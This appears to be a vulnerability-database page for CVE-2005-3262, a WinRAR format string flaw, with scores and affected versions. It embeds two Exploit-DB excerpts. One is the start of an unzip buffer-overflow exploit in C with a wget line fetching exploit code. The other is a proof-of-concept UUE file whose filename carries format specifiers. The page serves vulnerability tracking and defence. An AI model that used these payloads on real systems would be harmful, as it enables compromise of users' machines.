CVE-2005-3262
published 2005-10-20CVE-2005-3262: Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.79%
94.5th percentile
Format string vulnerability in RARLAB WinRAR 2.90 through 3.50 allows remote attackers to execute arbitrary code via format string specifiers in a UUE/XXE file, which are not properly handled when WinRAR displays diagnostic errors related to an invalid filename.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
| rarlab | winrar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Info-ZIP UnZip 5.x - File Name Buffer Overflow
exploitdb·2005-12-19
CVE-2005-4667 Info-ZIP UnZip 5.x - File Name Buffer Overflow
Info-ZIP UnZip 5.x - File Name Buffer Overflow
---
// source: https://www.securityfocus.com/bid/15968/info
Info-ZIP 'unzip' is susceptible to a filename buffer-overflow vulnerability. The application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
This issue allows attackers to execute arbitrary machine code in the context of users running the affected application.
/*
By DVDMAN ([email protected])[email protected]
http://www.snosoft.com
http://WWW.L33TSECURITY.COM
L33T SECURITY
Keep It Private
based on code by hackbox.ath.cx
> wget http://hackbox.ath.cx/mizc/unzip-expl.c
lame unzip
#include
#include
#define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
#define BUF 3264+1900+20000
#define LOC 3262
Exploit-DB
RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String
exploitdb·2005-10-11
CVE-2005-3262 RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String
RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String
---
source: https://www.securityfocus.com/bid/15062/info
WinRAR is prone to multiple remote vulnerabilities. These issues include a format string and a buffer overflow vulnerability. Successful exploitation may allow an attacker to execute arbitrary code on a vulnerable computer.
WinRAR 3.50 and prior versions are vulnerable to these issues.
begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end
No writeups or analysis indexed.
http://secunia.com/advisories/16973/http://secunia.com/secunia_research/2005-53/advisory/http://www.rarlabs.com/rarnew.htmhttp://www.securityfocus.com/bid/15062http://secunia.com/advisories/16973/http://secunia.com/secunia_research/2005-53/advisory/http://www.rarlabs.com/rarnew.htmhttp://www.securityfocus.com/bid/15062
2005-10-20
Published